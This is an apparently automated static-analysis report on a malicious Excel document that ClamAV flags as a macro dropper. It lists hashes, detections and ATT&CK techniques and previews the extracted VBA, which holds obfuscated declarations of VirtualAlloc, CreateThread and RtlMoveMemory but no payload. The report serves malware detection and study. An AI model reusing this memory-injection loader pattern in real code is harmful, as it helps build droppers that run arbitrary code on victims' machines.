Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0640a8b8122dea4b…

MALICIOUS

Office (OLE)

29.5 KB Created: 2018-01-16 12:08:00 Authoring application: Microsoft Excel First seen: 2018-01-23
MD5: 5491db5b9314496f6a082c4374de6202 SHA-1: 6647b2e4638cbf7b6c4430face67f6d74ef165e1 SHA-256: 0640a8b8122dea4b40635c33969724384d9a56d2d8004eb7d28f53a890e6067b
100 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution T1055 Process Injection

The critical ClamAV heuristic identifies this file as a dropper. The VBA macro contains calls to VirtualAlloc and CreateThread, indicating it is designed to allocate memory and execute arbitrary code. This functionality is commonly used by droppers to download and execute a second-stage payload.

Heuristics 3

  • ClamAV: Doc.Dropper.Agent-6448896-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6448896-0
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1684 bytes
SHA-256: 8b043dd31ce779e3fddb7a4b06930a17a98731c0023fd070a2db19e3e205a9c4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If VBA7 Then
    Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Pmnfaukd As Long, ByVal Snddhhsj As Long, ByVal Izzvvrosu As LongPtr, Sntphtef As Long, ByVal Lrh As Long, Kmzta As Long) As LongPtr
    Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Mfbi As Long, ByVal Stveufhn As Long, ByVal Awrqgkeo As Long, ByVal Qyuqmovc As Long) As LongPtr
    Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Xyw As LongPtr, ByRef Ekupcyhxw As Any, ByVal Lhdeu As Long) As LongPtr
#Else
    Private Declare Function CreateThread Lib "kernel32" (ByVal Pmnfaukd As Long, ByVal Snddhhsj As Long, ByVal Izzvvrosu As Long, Sntphtef As Long, ByVal Lrh As Long, Kmzta As Long) As Long
    Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Mfbi As Long, ByVal Stveufhn As Long, ByVal Awrqgkeo As Long, ByVal Qyuqmovc As Long) As Long
    Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Xyw As Long, ByRef Ekupcyhxw As Any, ByVal Lhdeu As Long) As Long
#End If






Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"